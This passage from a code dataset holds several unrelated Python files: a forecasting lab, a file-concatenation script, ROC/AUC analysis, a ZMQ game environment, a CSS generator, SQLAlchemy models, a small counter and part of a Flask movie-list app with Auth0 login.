coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 8 10:36:30 2020\r\n\r\n@author: ho\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.api as sm\r\nimport os\r\n\r\nos.chdir('D:/TEACHING/TEACHING KOREA/SEOULTECH/PYTHON/2020 SPRING/LABS/')\r\n\r\npd.date_range('1/1/2020', periods=5)\r\npd.date_range('1/1/2020', periods=5, freq='M')\r\n\r\n# Umbrella Sales Example\r\n# Create an umbrella time series (freq='Q') and plot it using plt.plot.\r\nsales = [125,153,106,88,118,161,133,102,138,144,113,80,109,137,125,109,130,165,128,96]\r\nt = pd.date_range('2015-01', periods=20, freq='Q')\r\ns = pd.Series(sales, index=t)\r\nplt.plot(s)\r\nplt.ylim(0,200)\r\nplt.title('Umbrella Sales')\r\nplt.show()\r\n\r\n# TV Sets Sales Example\r\n# Create a tvset time series (freq='Q') and plot it using plt.plot.\r\nsales = [4.8,4.1,6,6.5,5.8,5.2,6.8,7.4,6,5.6,7.5,7.8,6.3,5.9,8,8.4]\r\nt = pd.date_range('2017-01', periods=16, freq='Q')\r\ns = pd.Series(sales, index=t)\r\nplt.plot(s)\r\nplt.ylim(0,10)\r\nplt.title('TV Sets Sales')\r\nplt.xticks(rotation=60)\r\nplt.show()\r\n\r\n# Lawn-Maintenance Expense Example\r\n# Create a lawn-maintenance time series (freq='M') and plot it using plt.plot.\r\nlawn = pd.read_excel('lawn.xlsx', header=None)\r\nlawn.columns = ['rev']\r\nlawn.index = pd.date_range('2018-01', periods=36, freq='M')\r\nplt.plot(lawn)\r\nplt.ylim(0,500)\r\nplt.title('Lawn-Maintenance Expense')\r\nplt.xticks(rotation=60)\r\nplt.show()\r\n\r\n# Import the bicycle data.\r\nsales = [21.6,22.9,25.5,21.9,23.9,27.5,31.5,29.7,28.6,31.4]\r\nt = np.arange(1,11)\r\n\r\n# Plot the time series.\r\nplt.plot(t, sales)\r\nplt.ylim(0,35)\r\nplt.title('Bicycle Sales')\r\nplt.xlabel('Year')\r\nplt.ylabel('Sales (1000s)')\r\nplt.grid(axis='y', linestyle='--')\r\nplt.show()\r\n\r\n# Conduct a regression analysis and plot the regression equation on the time series plot.\r\ny = sales\r\nx = t\r\nx = sm.add_constant(x)\r\nmodel = sm.OLS(y,x).fit()\r\nmodel.summary()\r\n#sales = 20.4 + 1.1 t\r\n\r\n# Forecast year 11 and year 12.\r\ntest_data = [11, 12]\r\nmodel.predict(sm.add_constant(test_data))\r\n\r\n# Create an error table and calculate ME, MAE, MAPE, and MSE.\r\ny_pred = model.predict(x)\r\nerror = y - y_pred\r\nabs_error = np.abs(error)\r\npct_error = (abs_error / sales)*100\r\nsq_error = error**2\r\nme = round(error.mean(),2)\r\nmae = round(abs_error.mean(),2)\r\nmape = round(pct_error.mean(),2)\r\nmse = round(sq_error.mean(),2)\r\nprint(me, mae, mape, mse)\r\n\r\n# Create a tracking signal table and plot the signals.\r\nsum_error = np.cumsum(error)\r\nsum_ae = np.cumsum(abs_error)\r\nmad = sum_ae / t\r\nts = sum_error / mad\r\nplt.plot(ts)\r\nplt.grid(axis='y', linestyle='--')\r\nplt.title('Tracking Signal')\r\nplt.show()\r\n\r\n# Import the cholesterol revenue data.\r\nrev = [23.1,21.3,27.4,34.6,33.8,43.2,59.5,64.4,74.2,99.3]\r\nt = np.arange(1,11)\r\ndf = pd.DataFrame({'t':t, 'rev':rev})\r\n\r\n# Plot the time series.\r\nplt.plot(df.t, df.rev, marker='o')\r\nplt.grid(axis='y', linestyle='--')\r\nplt.xlabel('Year')\r\nplt.ylabel('Revenue')\r\nplt.title('Cholesterol Revenue')\r\nplt.show()\r\n\r\n
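# NOTE: the revenue series curves upward, so the next block fits a quadratic\r\n# trend (rev ~ b0 + b1*t + b2*t^2) by adding a squared-time regressor; with\r\n# the fitted coefficients reported below, the year-11 forecast works out to\r\n# roughly 24.1817 - 2.1060*11 + 0.9216*11**2, i.e. about 112.5.\r\n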
# Conduct a regression analysis and plot the regression equation on the time series plot.\r\ndf['t_sq'] = df.t**2\r\ny = df.rev\r\nx = df.drop('rev', axis=1)\r\nx = sm.add_constant(x)\r\nmodel = sm.OLS(y,x).fit()\r\nmodel.summary()\r\n#revenue = 24.1817 - 2.1060 * t + 0.9216 * t^2\r\n\r\n# Forecast year 11 and year 12.\r\ntest_data = pd.DataFrame({'t': [11, 12],\r\n                          't_sq':[11**2, 12**2]})\r\nmodel.predict(sm.add_constant(test_data))\r\n\r\n# Create an error table and calculate ME, MAE, MAPE, and MSE.\r\ny_pred = model.predict(x)\r\nerror = y - y_pred\r\nabs_error = np.abs(error)\r\npct_error = (abs_error / y)*100  # divide by the revenue series, not the earlier bicycle sales list\r\nsq_error = error**2\r\ntable = pd.concat([error,abs_error, pct_error, sq_error], axis=1)\r\ntable.columns = ['Error', 'Abs Error', '% Error', 'Sq Error']\r\ntable\r\nme = round(error.mean(),2)\r\nmae = round(abs_error.mean(),2)\r\nmape = round(pct_error.mean(),2)\r\nmse = round(sq_error.mean(),2)\r\nprint(me, mae, mape, mse)\r\n\r\n# Create a tracking signal table and plot the signals.\r\nsum_error = np.cumsum(error)\r\nsum_ae = np.cumsum(abs_error)\r\nmad = sum_ae / t\r\nts = sum_error / mad\r\nplt.plot(ts)\r\nplt.grid(axis='y', linestyle='--')\r\nplt.title('Tracking Signal')\r\nplt.show()","repo_name":"denverkim/DATA_MINING","sub_path":"LAB8.py","file_name":"LAB8.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"20484819085","text":"import os, sys, glob\nimport argparse\n\ndef InitParser():\n    parser = argparse.ArgumentParser(description='')\n    parser.add_argument('--first', type=str, help='first day')\n    parser.add_argument('--last', type=str, help='last day')\n    parser.add_argument('--name', type=str, help='name of files without times')\n    parser.add_argument('--source_dir', type=str, help='path to files directory')\n    parser.add_argument('--timestep', type=float,default=0.2, help='timesteps in days')\n    return parser\n\ndef GetLastDayOfFile(fileName):\n    return fileName.split('_to_')[-1].split('days')[0]\n\ndef GetListOfFilesToConcat(timesDict, curr_first, last, timestep):\n    if curr_first == last:\n        return []\n\n    if curr_first not in timesDict:\n        print(curr_first, \" is not the first in any file\")\n        return None\n\n    for f in timesDict[curr_first]:\n        print(f)\n        l = GetListOfFilesToConcat(timesDict, str(float(GetLastDayOfFile(f)) + timestep), last, timestep)\n        if l is not None:\n            return [f] + l\n\n        l = GetListOfFilesToConcat(timesDict, str(float(GetLastDayOfFile(f))), last, timestep)\n        if l is not None:\n            return [f] + l\n        '''\n        for step in range(0,20):\n            l = GetListOfFilesToConcat(timesDict, str(float(GetLastDayOfFile(f)) + 0.1 * step), last, timestep)\n            if l is not None:\n                return [f] + l\n        '''\n\n    return None\n\ndef ConcateFiles(files):\n    data = \"\"\n    first = True\n    for f in files:\n        file = open(f,mode=\"r\")\n        if not first:\n            data += \", \"\n        data += file.readline()\n        first = False\n\n    return data\n\nif __name__ == \"__main__\":\n    parser = InitParser()\n    args = parser.parse_args()\n    files = glob.glob(args.source_dir + \"\\\\\" + args.name + \"*\")\n    begintimeDict = dict()\n    for f in files:\n        beginTime = f.split('time_')[-1].split('_to')[0]\n        if beginTime not in begintimeDict:\n            begintimeDict[beginTime] = []\n        begintimeDict[beginTime].append(f)\n\n    filesToConcat = GetListOfFilesToConcat(begintimeDict, args.first, args.last, args.timestep)\n    if filesToConcat is None:\n        print(\"could not concat those files...\")\n    else:\n        newFile = open(args.source_dir + \"\\\\\" + args.name + \"time_\" + args.first + 
\"_to_\" + args.last, mode=\"w\")\n newFile.write(ConcateFiles(filesToConcat))\n newFile.close()\n print(\"new file has been saved to \", args.source_dir + \"\\\\\" + args.name + \"time_\" + args.first + \"_to_\" + args.last)","repo_name":"hilaglanz/TCE","sub_path":"ConcateFiles.py","file_name":"ConcateFiles.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1418150232","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# Author:Shansong Huang\n# Date:2017-11-22\n# Calculate the AUC value and get ROC curve\nimport pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_auc_score, roc_curve\n\ny_pred_path = 'y_pred_35.csv'\ny_true_path = 'y_true_35.csv'\n\n\n# get labels from each CSV file\n# label_path: each CSV files path\n# return: CSV's information\ndef get_label_array(label_path):\n dataframe = pandas.read_csv(label_path, header=None)\n dataset = dataframe.values\n label = np.array(dataset)\n return label\ny_true = get_label_array(y_true_path)\ny_pred = get_label_array(y_pred_path)\nfinal_num = y_pred.shape[0]\nnum = y_pred.shape[1]\nauc = []\nroc_fpr = []\nroc_tpr = []\nroc_thresholds = []\nfor i in range(num):\n auc.append(roc_auc_score(y_true[:final_num, i], y_pred[:final_num, i]))\n fpr, tpr, thresholds = roc_curve(\n y_true[:final_num, i], y_pred[:final_num, i])\n roc_fpr.append(fpr)\n roc_tpr.append(tpr)\n roc_thresholds.append(thresholds)\n# roc_fpr: 1-Specificity\n# roc_tpr: Sensitivity\n# youden_index = Sensitivity + Specificity -1\n# = roc_tpr - roc_fpr\ncut_poit = {}\nall_cut_point = {}\ndisease_name = (\n 'Atelectasis', 'Cardiomegaly', 'Effusion', 'Infiltration',\n 'Mass', 'Nodule', 'Pneumonia', 'Pneumothorax', 'Consolidation',\n 'Edema', 'Emphysema', 'Fibrosis', 'Pleural_Thickening', 'Hernia')\ndict_thresholds_x = {}\ndict_thresholds_y = {}\nall_dict_thresholds_x = {}\nall_dict_thresholds_y = {}\nfor n in range(14):\n for i in range(len(roc_fpr[n])):\n youden_index = roc_tpr[n][i] - roc_fpr[n][i]\n cut_poit[youden_index] = roc_thresholds[n][i]\n dict_thresholds_x[youden_index] = roc_fpr[n][i]\n dict_thresholds_y[youden_index] = roc_tpr[n][i]\n Max = max(cut_poit.keys())\n all_cut_point[disease_name[n]] = cut_poit[Max]\n all_dict_thresholds_x[disease_name[n]] = dict_thresholds_x[Max]\n all_dict_thresholds_y[disease_name[n]] = dict_thresholds_y[Max]\n cut_poit = {}\n dict_thresholds_x = {}\n dict_thresholds_y = {}\n# print('Value of Youden index:', Max)\nprint('Num of test:', final_num)\nprint('10520 : with hernia*3 and without normal')\nprint('22600 : with hernia*3 and with normal')\nprint('10340 : with hernia and without normal')\nprint('22420 : with hernia and with normal')\n\nprint('Value of AUC:')\nfor o, a in zip(disease_name, auc):\n print(o, a)\nprint('--------------------')\nprint('Value of all cut point:')\nfor key, value in sorted(all_cut_point.items()):\n print(key, value)\npandas.DataFrame(auc).to_csv(\n 'AUC.csv', header=None, index=None)\noutfile = open('dict.txt', 'w')\nfor key, value in sorted(all_cut_point.items()):\n outfile.write(str(key) + ':' + str(value) + '\\n')\nplt.rcParams['savefig.dpi'] = 600\n\nplt.figure(0)\nplt.plot([0, 1], [0, 1], 'k--')\nfor i in range(num):\n plt.plot(roc_fpr[i], roc_tpr[i], label=disease_name[i])\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.savefig('roc.png')\nplt.show()\n\nfor i in range(num):\n 
plt.figure(num+1)\n    plt.plot([0, 1], [0, 1], 'k--')\n    plt.plot(roc_fpr[i], roc_tpr[i])\n    label = str('True Positive Rate: ' + str(\n        all_dict_thresholds_y[disease_name[i]]) + '\\n' +\n        'False Positive Rate: ' + str(all_dict_thresholds_x[disease_name[i]])\n        + '\\n' + 'Cut point: ' + str(all_cut_point[disease_name[i]]))\n    plt.scatter(\n        all_dict_thresholds_x[disease_name[i]],\n        all_dict_thresholds_y[disease_name[i]],\n        c='r', marker='o', label=label)\n    plt.xlabel('False positive rate')\n    plt.ylabel('True positive rate')\n    plt.title(disease_name[i])\n    plt.legend(loc='best')\n    plt.savefig(str(i+1) + '.png')\n    plt.clf()\n","repo_name":"sasonhuang/Digital-Radiography","sub_path":"DR_Densenet169/AUC.py","file_name":"AUC.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"}
+{"seq_id":"41849805180","text":"import zmq\nimport numpy as np\nimport re\nfrom distutils.util import strtobool\n\ntry:\n    import signal\nexcept ImportError as ie:\n    ie.args += (\"No signal module found. Assuming SIGPIPE is okay.\", )\n    raise\n\ncontext = None\nsocket = None\n\n\nclass GameEnv:\n    def __init__(self, zmq_port, mode, thread_num):\n        global context\n        global socket\n\n        context = zmq.Context()\n        self.socket = context.socket(zmq.REQ)\n        self.socket.connect(\"tcp://127.0.0.1:%s\" % zmq_port)\n\n        if mode == \"Shooter\":\n            self.actions = [0, 1, 2, 3, 4, 5, 999]  # shooter\n            # actions for selecting each entity or stopping\n            # Action 5 - ignore all entities\n            # Action 999 - take all entities\n        else:\n            self.actions = [0, 1, 2, 3, 4, 999]  # EMA\n\n    def process_msg(self, msg):\n        tmp = re.split(' ', msg)\n        state = tmp[0]\n        reward = tmp[1]\n        terminal = tmp[2]\n        return np.array(state.split(', '),\n                        float), float(reward), strtobool(terminal)\n\n    def newGame(self):\n        self.socket.send(\"newGame\")\n        msg = self.socket.recv()\n        while msg is None:\n            msg = self.socket.recv()\n        return self.process_msg(msg)\n\n    def newGameEval(self):\n        self.socket.send(\"newGameEval\")\n        msg = self.socket.recv()\n        while msg is None:\n            msg = self.socket.recv()\n        return self.process_msg(msg)\n\n    def step(self, action, query):\n        self.socket.send(str(action) + \" \" + str(query))\n        msg = self.socket.recv()\n        while msg is None:\n            msg = self.socket.recv()\n        return self.process_msg(msg)\n\n    def evalInit(self):\n        self.socket.send(\"evalInit\")\n        msg = self.socket.recv()\n        try:\n            assert (msg == 'done')\n        except AssertionError as e:\n            e.args += (msg, )\n            raise\n\n    def evalStart(self):\n        self.socket.send(\"evalStart\")\n        msg = self.socket.recv()\n        try:\n            assert (msg == 'done')\n        except AssertionError as e:\n            e.args += (msg, )\n            raise\n\n    def evalEnd(self):\n        self.socket.send(\"evalEnd\")\n        msg = self.socket.recv()\n        try:\n            assert (msg == 'done')\n        except AssertionError as e:\n            e.args += (msg, )\n            raise\n\n    def getActions(self):\n        return self.actions\n","repo_name":"adi-sharma/RLIE_A3C","sub_path":"code/a3c/game_env.py","file_name":"game_env.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"43"}
+{"seq_id":"9374371183","text":"import json\n# import random\n# #import matplotlib.colors;\n\n# def randomChooser(colors):\n#     colorsCopy = colors.copy();\n#     text = colorsCopy.pop(0); #second\n#     background = colorsCopy.pop(0); #first\n#     return [background, text];\n\n# with open ('./country-colors-true.json', 'r', encoding=\"utf-8\") as f:\n#     data = json.load(f)\n\n# newDict = {}\n# for i in data:\n#     
newDict[i] = randomChooser(data[i])\n\n\n\n# with open (\"./country-colors-true-single.json\", 'w') as f:\n# json.dump(newDict, f, indent=4)\n\t\n\n\n\nwith open (\"./country-colors-true-single.json\", \"r\", encoding=\"utf-8\") as f:\n\tdata = json.load(f)\n\n# with open (\"./country-flag-true.json\", \"r\") as f:\n# \tdataFlag = json.load(f)\n\n\nwith open (\"../countryCards.css\", \"w\") as f:\n\tf.write(\"\")\n\n\nwith open (\"../countryCards.css\", \"a\") as f:\n\tfor i in data:\n\t\tunchanged = i\n\t\ti = i.replace(\"(\", \"\")\n\t\ti = i.replace(\")\", \"\")\n\t\ti = i.replace(\" \", \"\")\n\t\ti = i.replace(\"'\", \"\")\n\t\ti = i.replace(\".\", \"\")\n\t\ti = i.replace(\",\", \"\")\n\t\tif \"Ivoire\" in i:\n\t\t\tprint(i)\n\t\t#print(i + \"\\n\")\n\t\tf.write(f\"\"\".{i}-country {{\n\tbackground-color: {data[unchanged][0]};\n}}\n.{i}-text {{\n\tcolor:{data[unchanged][1]};\n}}\n\n.{i}-country:hover {{\n\tbackground-color: {data[unchanged][1]};\n\ttransition: 0.3s;\n}}\n.{i}-country:hover .{i}-text {{\n\tcolor:{data[unchanged][0]};\n\ttransition: 0.3s;\n}}\n\n\"\"\")\n\t\t","repo_name":"naowalrahman/ecoventures-ui","sub_path":"src/pages/locations/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15834944302","text":"# coding: utf-8\nfrom sqlalchemy import Column, Date, DateTime, ForeignKey, text\nfrom sqlalchemy.dialects.mysql import INTEGER, TINYTEXT\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\nmetadata = Base.metadata\n\n\nclass Ataques(Base):\n __tablename__ = 'ataques'\n\n id_ataque = Column(INTEGER(11), primary_key=True)\n nombre_ataque = Column(TINYTEXT)\n arma = Column(TINYTEXT, nullable=False)\n\n\nclass Cazadores(Base):\n __tablename__ = 'cazadores'\n\n id_cazador = Column(INTEGER(11), primary_key=True)\n nombre = Column(TINYTEXT)\n birthday = Column(Date)\n rango = Column(TINYTEXT)\n pais_origen = Column(TINYTEXT, nullable=False)\n\n\nclass Demonios(Base):\n __tablename__ = 'demonios'\n\n id_demonio = Column(INTEGER(11), primary_key=True)\n nombre = Column(TINYTEXT, nullable=False)\n rango = Column(TINYTEXT, nullable=False)\n\n\nclass Enfrentamientos(Base):\n __tablename__ = 'enfrentamientos'\n\n id_enfrentamiento = Column(INTEGER(11), primary_key=True)\n fecha = Column(DateTime)\n\n\nclass CazadoresAtaques(Base):\n __tablename__ = 'cazadores_ataques'\n\n id_cazador_ataque = Column(INTEGER(11), primary_key=True)\n id_ataque = Column(ForeignKey('ataques.id_ataque'), index=True)\n id_cazador = Column(ForeignKey('cazadores.id_cazador'), index=True)\n desde = Column(DateTime, server_default=text(\"current_timestamp()\"))\n\n ataques = relationship('Ataques')\n cazadores = relationship('Cazadores')\n\n\nclass DetalleEnfrentamientos(Base):\n __tablename__ = 'detalle_enfrentamientos'\n\n id_detalle_enfrentamiento = Column(INTEGER(11), primary_key=True)\n id_cazador = Column(ForeignKey('cazadores.id_cazador'), index=True)\n id_demonio = Column(ForeignKey('demonios.id_demonio'), index=True)\n id_enfrentamiento = Column(ForeignKey('enfrentamientos.id_enfrentamiento'), index=True)\n estado_cazador = Column(TINYTEXT)\n estado_demonio = Column(TINYTEXT)\n\n cazadores = relationship('Cazadores')\n demonios = relationship('Demonios')\n enfrentamientos = 
relationship('Enfrentamientos')\n","repo_name":"fvildoso/sqlalchemy-kimetsunoyaiba","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"38361448153","text":"def contaPares(lista): # list function: counts even and odd values\n    pares = 0\n    impares = 0 # both counters start at 0\n    for num in lista:\n        if (num % 2) == 0: # even numbers\n            pares = pares + 1\n        else:\n            impares = impares + 1 # odd numbers\n    return pares, impares\n\nlista = list() \n\nq = int(input('How many values will the list have? '))\nwhile q < 0:\n    print('Error')\n    q = int(input('How many values will the list have? '))\n\nfor c in range(q):\n    num = int(input('Value:'))\n    lista.append(num)\n\nprint('The number of even and odd values is, respectively:',contaPares(lista))","repo_name":"Arthurssyllos/exercicio_lista","sub_path":"exe01.py","file_name":"exe01.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"72398523329","text":"from ctypes import cast\nfrom distutils.file_util import move_file\nfrom flask import Flask, redirect, render_template, request, session, url_for, current_app, jsonify, abort\nimport db\nimport tmdb\nimport os\nimport recommend\nimport general\nfrom os import dup, environ as env\nimport requests\n\n\n#auth imports\nfrom functools import wraps\nimport json\nfrom werkzeug.exceptions import HTTPException\nfrom authlib.integrations.flask_client import OAuth\nfrom six.moves.urllib.parse import urlencode\n\napp = Flask(__name__)\n\n\n#Set api\napi_url=os.environ['API_KEYWORD_QUERY_URL']\n\napi_key = os.environ['API_KEY']\n\n\n\n\n@app.before_first_request\ndef initialize():\n    db.setup()\n    app.register_error_handler(404, page_not_found)\n    app.register_error_handler(405, method_not_allowed)\n\n# set app secret key\napp.secret_key = \"i dunnodliufawefnluiFS\"\n\n\n\n# TODO: enable and configure properly once auth0 is setup\noauth = OAuth(app)\n\nAUTH0_CLIENT_ID = env['auth0_client_id']\nAUTH0_CLIENT_SECRET = env['auth0_client_secret']\nAUTH0_DOMAIN = env['auth0_domain']\n\n# baseUrl = 'https://infinite-inlet-24245.herokuapp.com'\n\nauth0 = oauth.register(\n    'auth0',\n    client_id=AUTH0_CLIENT_ID,\n    client_secret=AUTH0_CLIENT_SECRET,\n    api_base_url='https://' + AUTH0_DOMAIN,\n    access_token_url='https://' + AUTH0_DOMAIN + '/oauth/token',\n    authorize_url='https://' + AUTH0_DOMAIN + '/authorize',\n    client_kwargs={\n        'scope': 'openid profile email',\n    },\n)\n\n###AUTH STUFF\n\n@app.route('/callback')\ndef callback_handling():\n    # Handles response from token endpoint\n    auth0.authorize_access_token()\n    resp = auth0.get('userinfo')\n    userinfo = resp.json()\n\n    # Store the user information in flask session.\n    session['jwt_payload'] = userinfo\n    session['profile'] = {\n        'user_id': userinfo['sub'],\n        'name': userinfo['name'],\n        'picture': userinfo['picture'],\n        'email': userinfo['email']\n    }\n    db.add_new_user(userinfo['sub'], userinfo['name'], \"\", False, userinfo['picture'])\n\n    if 'return_url' in session.keys():\n        return redirect(session['return_url'])\n    return redirect(url_for('home'))\n\n\n@app.route('/login')\ndef login():\n    # return auth0.authorize_redirect(redirect_uri=\"http://127.0.0.1:5000/callback\")\n    return auth0.authorize_redirect(redirect_uri=url_for('callback_handling', _external=True))\n\n@app.route('/logout')\ndef logout():\n    # Clear session stored data\n    session.clear()\n    # Redirect user to logout 
endpoint\n params = {'returnTo': url_for('start_page', _external=True), 'client_id': AUTH0_CLIENT_ID}\n return redirect(auth0.api_base_url + '/v2/logout?' + urlencode(params))\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n if 'profile' not in session:\n # Redirect to Login page here\n return redirect('/login')\n return f(*args, **kwargs)\n\n return decorated\n\n\n# *** replaces isLoggedIn = 'profile' in session ***\n# args are positional arguments and kwargs are keyword arguments (dictionary)\n# isLoggedIn in kwargs gets passed to the isLoggedIn specified in the parameter list of the wrapped function\ndef logged_in(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n \n kwargs['loggedInInfo'] = {}\n\n if 'profile' not in session:\n kwargs['loggedInInfo']['isLoggedIn'] = False\n kwargs['loggedInInfo']['profilePicture'] = None\n kwargs['loggedInInfo']['username'] = None\n kwargs['loggedInInfo']['email'] = None\n # current_app.logger.info(kwargs['isLoggedIn'])\n else:\n kwargs['loggedInInfo']['isLoggedIn'] = True\n kwargs['loggedInInfo']['profilePicture'] = session['profile']['picture']\n kwargs['loggedInInfo']['username'] = session['profile']['name']\n kwargs['loggedInInfo']['email'] = session['profile']['email']\n # kwargs['curUserId'] = session['profile']['user_id']\n # current_app.logger.info(kwargs['isLoggedIn'])\n return f(*args, **kwargs)\n return decorated\n\n\n# PAGES\n\n\n@app.route('/', methods=['GET'])\ndef start_page():\n return redirect(url_for('welcome'))\n\n@app.route('/welcome')\n@logged_in\ndef welcome(loggedInInfo):\n # current_app.logger.info(isLoggedIn)\n return render_template('welcome.html', \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'])\n\n@app.route('/home', methods=['GET'])\n@logged_in\ndef home(loggedInInfo):\n most_popular_2d = db.get_most_popular_media()\n # [['323660', '99861'], ['9320', '99861', '2473', '299536'], ['24428', '299534']\n watched_info=[]\n watching_info=[]\n will_watch_info=[]\n for i in range(len(most_popular_2d[0])):\n info={}\n\n media = db.get_media_by_id(most_popular_2d[0][i])\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + most_popular_2d[0][i]\n\n watched_info.append(info) \n\n for i in range(len(most_popular_2d[1])):\n info={}\n media = db.get_media_by_id(most_popular_2d[1][i])\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + most_popular_2d[1][i]\n \n watching_info.append(info)\n\n for i in range(len(most_popular_2d[2])):\n info={}\n media = db.get_media_by_id(most_popular_2d[2][i])\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + most_popular_2d[2][i]\n\n will_watch_info.append(info)\n return render_template('homepage.html', watched_info=watched_info, watching_info=watching_info, will_watch_info=will_watch_info, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'])\n\n\n@app.route('/community', methods=['GET'])\n@logged_in\ndef community(loggedInInfo):\n is_watched = True \n is_watching = True \n is_will_watch = True\n if(loggedInInfo['isLoggedIn'] == True):\n user_id = str(session['profile']['user_id'])\n watched_score, 
watching_score, will_watch_score = recommend.get_score_list(user_id)\n watched_users = recommend.get_user_info(watched_score)\n if(len(watched_users) == 0):\n watched_users = recommend.get_top5_watched_users()\n is_watched = False\n watching_users = recommend.get_user_info(watching_score)\n if(len(watching_users) == 0):\n watching_users = recommend.get_top5_watching_users()\n is_watching = False\n will_watch_users = recommend.get_user_info(will_watch_score)\n if(len(will_watch_users) == 0):\n will_watch_users = recommend.get_top5_will_watch_users()\n is_will_watch = False\n for dic in will_watch_users:\n if dic['info']['user_id'] == user_id:\n will_watch_users.remove(dic)\n for dic in watching_users:\n if dic['info']['user_id'] == user_id:\n watching_users.remove(dic)\n for dic in watched_users:\n if dic['info']['user_id'] == user_id:\n watched_users.remove(dic)\n else:\n is_watched = False\n is_watching = False\n is_will_watch = False\n watched_users, watching_users, will_watch_users = recommend.get_top5_users()\n return render_template('community.html', \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], \n watched_users = watched_users, watching_users = watching_users, will_watch_users = will_watch_users,\n is_watched = is_watched, is_watching = is_watching, is_will_watch = is_will_watch)\n\n\n@app.route('/search', methods=['GET'])\n@logged_in\ndef search(loggedInInfo):\n session['return_url'] = request.url\n current_app.logger.info(session['return_url'])\n search_type = request.args[\"search_options\"]\n search_query = request.args[\"search_query\"]\n if search_type == \"media\" :\n api_query = api_url +search_query\n response = (requests.request(\"GET\", api_query)).json()\n res_ids = [str(media['id']) for media in response['results']]\n if (loggedInInfo['isLoggedIn']):\n addedLists = db.is_media_list_in_user(res_ids, session['profile']['user_id'])\n else:\n addedLists = db.is_media_list_in_user(res_ids, \"-1\")\n current_app.logger.info(addedLists)\n return render_template('search.html', searchQuery= search_query, motionPictures = response[\"results\"], \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'],\n addedLists = addedLists)\n else:\n \n pattern_match_search = '%'+ search_query + '%'\n if (loggedInInfo['isLoggedIn']):\n users = db.get_user(pattern_match_search, session['profile']['user_id'], True)\n followees = db.get_followee_ids_by_user_id(session['profile']['user_id'])\n for user in users:\n if (user['user_id'] in followees):\n user['is_followed'] = True\n else:\n user['is_followed'] = False\n else:\n users = db.get_user(pattern_match_search, None, False)\n\n return render_template('userSearch.html', searchQuery= search_query, users=users, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'])\n\n\n# Check if media is in db then add to specified list\n@app.route('/addToList', methods=['POST'])\n@requires_auth\ndef addToList():\n media_id = request.form['mediaID']\n media_type = request.form['media_type']\n media_title = request.form['media_title']\n media_poster_path = request.form['media_poster']\n\n if(db.is_media_in_db(media_id) == False):\n db.add_new_media(media_id, media_type,media_title,media_poster_path)\n \n # Check if media is already in a watchlist\n dupe_add = db.is_media_in_user(media_id, session['profile']['user_id'])\n current_app.logger.info(dupe_add)\n 
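# dupe_add is (already_in_a_list, which_list); if the media is already\n # tracked for this user, move it to the requested list instead of\n # inserting a duplicate row\n 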
if(dupe_add[0]):\n db.update_list_db(session['profile']['user_id'], media_id, dupe_add[1], request.form['listType'])\n return redirect(session['return_url'])\n\n if request.form['listType'] == \"watching\":\n db.add_item_to_watching(session['profile']['user_id'], media_id)\n elif request.form['listType'] == \"watched\":\n db.add_item_to_watched(session['profile']['user_id'], media_id)\n else: # 'will_watch'\n db.add_item_to_will_watch(session['profile']['user_id'], media_id)\n return redirect(session['return_url'])\n\n\n@app.route('/profile', methods=['GET'])\n@logged_in\n@requires_auth\ndef profile(loggedInInfo):\n watched = db.get_user_media_for_list(str(session['profile']['user_id']), \"watched\")\n watched_info = []\n for i in range(len(watched)):\n info = {}\n \n media = db.get_media_by_id(watched[i])\n info['id'] = watched[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + watched[i]\n\n watched_info.append(info)\n\n watching = db.get_user_media_for_list(str(session['profile']['user_id']), \"watching\")\n watching_info = []\n for i in range(len(watching)):\n info = {}\n\n media = db.get_media_by_id(watching[i])\n info['id'] = watching[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = 